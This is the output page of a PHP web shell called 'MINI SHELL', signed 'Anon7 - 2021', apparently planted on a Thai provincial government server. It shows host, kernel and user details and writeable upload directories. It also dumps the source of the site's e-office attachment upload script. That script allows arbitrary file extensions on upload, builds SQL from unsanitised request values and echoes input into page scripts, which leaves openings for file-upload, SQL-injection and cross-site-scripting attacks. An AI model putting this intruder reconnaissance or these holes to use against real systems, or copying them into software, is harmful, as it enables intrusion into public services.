MINI SHELL

Server : Apache/2.2.2 (Fedora)
System : Linux App1.pathumtani.go.th 2.6.20-1.2320.fc5smp #1 SMP Tue Jun 12 19:40:16 EDT 2007 i686
User : apache ( 48)
PHP Version : 5.2.9
Disable Function : NONE
Directory :  /var/www/html/pathumthani_eoffice/application/agenda/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Current File : /var/www/html/pathumthani_eoffice/application/agenda/upload_form_20100210.php
<?
//=========================================
// Select document type where status is '1'
// @author Kridsada Satakarn
// @date 2009/06/20
// @return a array of list document type where status is '1'
//=========================================

include("../../config/config.inc.php");
function selectDocType()
{
global $id_sub;
	$arr = array();
//	$sql = "SELECT
//				tbl_main_menu.id_menu,
//				tbl_main_menu.name_menu
//				FROM
//				tbl_main_menu
//				WHERE
//				tbl_main_menu.status_menu =  '1' 
//				ORDER BY tbl_main_menu.id_menu ASC";
				
$sql = "	SELECT
			tbl_main_menu.id_menu,
			tbl_main_menu.name_menu,
			tbl_subject.meeting_date
			FROM
			tbl_main_menu ,
			tbl_subject
			WHERE
			tbl_main_menu.status_menu =  '1' AND
			tbl_subject.meeting_date <=  '".date('Y-m-d')."' AND
			tbl_subject.id_sub =  '$id_sub' AND
			tbl_main_menu.id_menu =  '3'
						
			UNION
			
			SELECT
			tbl_main_menu.id_menu,
			tbl_main_menu.name_menu,
			'0000-00-00' as meeting_date
			FROM
			tbl_main_menu
			WHERE
			tbl_main_menu.status_menu =  '1' AND
			tbl_main_menu.id_menu !=  '3'
			";		
				
				
				
	$query = mysql_query($sql);
	while($rs = mysql_fetch_assoc($query))
	{
		$arr[$rs[id_menu]] = $rs[name_menu];
	}
	return $arr;
}
function randomstr ($length)
    {
        $possible = '0198765432';
        $possible.= 'abcdefghijklmnopqrstuvwxyz';
        $str="";
        while ( strlen ($str) <= $length)
        {
            $str .= substr ($possible, (rand() % strlen($possible)), 1);
        }
        return ($str);
    }


/*
function updateDel($action, $filename, $timestamp)
{
	 echo "<script language=\"JavaScript\">
				window.parent.delListFile('$action', '$filename', 'timestamp');
				</script>";
}
*/
function updateUp( $action,$filename,  $timestamp, $id_sub, $id_type,$filenameorg, $rid)
{

		//action,filename,  timestamp, id_sub, id_type,doc_type, rid
     echo "<script language=\"JavaScript\">
               window.parent.upListFile('$action','$filename', '$timestamp', '$id_sub', '$id_type','$filenameorg', '$rid');
                </script>";
	
}


//===========================================
// Variable
//===========================================
$docType = selectDocType();
$path_temp = "attach_file/agenda/";
#$path = "attach_file/";
$path = "attach_file/agenda/";
?>

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=windows-874" />
<title>Untitled Document</title>
</head>
<body bgcolor="#F4F4F4" marginheight="0" marginwidth="0">
<?
	
	if($_POST)
	{
		$act = $_POST[hAct];
		$idsub = $_POST[hIdSub];
		$file = $_FILES['file1']['name'];
		$file_name = $_FILES['file1']['name'];		
		$id_type = $_POST[selDocType];
		$tempfile=randomstr(10);
		$arrtype=explode(".",$file);
		if(count($arrtype)>0){
			$tempfile=$tempfile.".".$arrtype[count($arrtype)-1];
			}
			
		if($act == "ADD")
		{
			//$timestamp = time();
//			$tempfile = $timestamp.$file;
			
			//$strrndname=randomstr(10);
			if(!file_exists("$path_temp"))
			{
				mkdir("$path_temp");
			}	
			$complete = @copy($_FILES['file1']['tmp_name'],"$path_temp$tempfile");
			if($complete)
			{
				//updateUp( '-1',$id_type);
//				$sql = "INSERT INTO tbl_attach_file(id_attach_file, id_type, attach_file, status_file,comment) VALUES ($idsub, $id_type, '$tempfile', 'Y',$file)";
//				$rss = mysql_db_query($dbname,$sql);
//				$last = mysql_insert_id();
                 $last="";
				updateUp('add',$tempfile,  $path_temp.$tempfile, $last, $id_type,$file, '');
			}
		}else if($act  == "EDIT")
		{
			if(!file_exists("$path_temp"))
			{
				mkdir("$path_temp");
			}	
		//	$timestamp = time();
//			$tempfile = $timestamp.$file;
			$up_file = @copy($_FILES['file1']['tmp_name'], "$path_temp$tempfile");
			if($up_file)
			{
				$sql = "INSERT INTO tbl_attach_file(id_attach_file, id_type,  attach_file, status_file,`comment` ) VALUES ($idsub, $id_type,   '$tempfile', 'Y' , '$file_name'  )";
				#echo $sql ; 
				$rss = mysql_db_query($dbname,$sql);
				$last = mysql_insert_id();
				updateUp('add',$tempfile,  $path_temp.$tempfile, $last, $id_type,$file, '');
			}
		}
	}else if($_GET)
	{
		$act = $_GET[action];
		$idsub = $_GET[id_sub];
	}
?>

 <form id="frmUpload" action="" method="post" enctype="multipart/form-data" >
<input type="file" id="file1" name="file1" style="width:200px;" />&nbsp;
<input type="submit" name="btnAddFile" id="btnAddFile"  value="à¾ÔèÁ" onclick="window.parent.showLoading();"  style="width:50px;height:20px;font-size:14px"/>
<br />
<select name="selDocType" id="selDocType">
      		<?
				foreach($docType as $key => $value){
					echo '<option value="'. $key.'" >'.$value.'</option>';
				}
			?>
</select>
<input type="hidden" name="hAct" value="<?= $act ?>"  />
<input type="hidden" name="hIdSub" value="<?= $idsub ?>"  />
</form>
</body>
</html>

Anon7 - 2021